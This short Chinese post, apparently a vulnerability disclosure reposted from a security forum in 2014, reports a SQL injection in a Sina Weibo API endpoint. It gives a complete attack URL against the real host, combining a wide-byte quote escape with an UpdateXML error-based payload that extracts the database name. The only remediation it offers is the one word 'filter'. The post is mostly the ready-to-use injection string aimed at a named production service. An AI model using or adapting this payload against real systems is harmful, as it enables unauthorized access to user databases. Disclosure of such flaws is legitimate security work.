新浪某API接口SQL注射,好像是重要的库,没细测。
http://api.sina.com.cn/weibo/wb/users_show.json?uid=1787467502%df',0,UpdateXML(1,CONCAT(0x5b,mid((SELECT database()),1,32),0x5d),1),1397571500)%23&source=2835469272&callback=STK_13975707689683
修复方案:
过滤
新浪某API接口SQL注射下载
来源:黑吧安全网 浏览:508次 时间:2014-06-12